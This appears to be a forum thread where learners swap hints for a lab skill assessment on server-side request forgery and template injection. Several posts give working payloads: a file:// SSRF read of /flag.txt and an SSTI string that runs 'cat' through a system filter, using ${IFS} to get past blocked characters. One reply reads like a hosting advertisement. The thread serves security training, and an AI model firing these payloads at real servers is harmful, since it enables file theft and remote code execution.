Could someone give me a hint? I’ve been racking my brains over this task. My attempts to retrieve the flag via the browser console have been unsuccessful. I have absolutely no ideas left. Help me 
My friend just do this:
add your given host to your etc/host file, without the port, truckapi.htb
and take a look at the LFI module of SSRF
put it on burpsuite in the api section with the file name flag.txt
youre welcome…! XD
this module its not hard, but tricky…
bro the website is forbidden , how can use the crdentials ??
add the IP to /etc/hosts =)
Probably not the intended route but load up burpsuite > capture the post request > add truckapi.htb to /etc/hosts > send payload “api=file:///flag.txt” > copy flag.
Yup, that’s how I found it too.
The updated module was too easy for the skill assessment part. The last module was a bit tricky
Thanks friend, that’s right. I found it thanks to your suggestion.
It took me some time to solve. Use Burp; when you check, it will be pretty obvious. 
I have done, I found there are two ways to get around this skill assessment:
- Using SSRF direct read flag, but you have to guess the path of the flag (but ctf lover can)
- Using SSTI, the injection point is location in the param of SSRF
The last method corresponds to module.
All methods don’t need white test, e.g. read js. All you need to do is using burp proxy request
I have done this, I found there are two ways to get around this skill assessment:
- Using SSRF direct read flag, but you have to guess the path of the flag (but ctf lover can)
- Using SSTI, the injection point is location in the param of SSRF
The last method corresponds to module.
All methods don’t need white test, e.g. read js. All you need to do is using burp proxy request
I think I did it wrong, I didn’t read any JS, I just got the flag by injection !!
Geiunely dont know what to do here honestly have tried everything
SSTI try this:
api=http://truckapi.htb/?id={{['cat${IFS}/flag.txt']|filter('system')}}
6 Likes
Have you tried testing with a different set of payloads or adjusting the payload’s request headers?
In my case, I ended up using a combination of standard and custom payloads, and tested them in different environments. One thing that helped me out a lot was setting up a more isolated testing environment, like a dedicated server hosting solution (I used IsHosting for mine), so I could tweak things without impacting my main setup.
For your specific issue, you might need to adjust the payload’s format or how it interacts with tplmap – sometimes small changes, like altering the payload’s encoding or the way you inject it, can make a big difference.
Today, I redid this module to brush up. Looks like they are blocking the file protocol now. I’m getting this error: Error (1): “Protocol “file” not supported or disabled in libcurl”. I’m actually happy they made this skill assessment harder than just reading the file… need to RCE now.
1 Like
The road that I traveled and that made me resolve this in 2 hours was:
Go to the site from the BURP browser, look for the proxy History the post methods, I used the one with ex … 01
send it to Repeater
Games with the 77 game as seen in the SSTI module, deleting what comes after 3D %and inserting 77
Once you understand which of the two ssti we are talking about, instead of the parenthesis used to validate which vulnerability you can use, just use the respective RCi you used in the SSTI module to find the flag
Small tips of the final script, I leave it deliberately incomplete:
api=http://site.htb/?id%3D{{[' <command + something + flag>']|fil..('sys...')}}
To Future Readers:
They changed the skill assessment part a couple of times, the currently intended path is all from the past sections + one tiny trick in the very last step to modify your payload to be able to get the flag which you can find in the payloadallthethings or hacktricks or even the command injection module.
like what do you do when the server blocks certain characters in your command.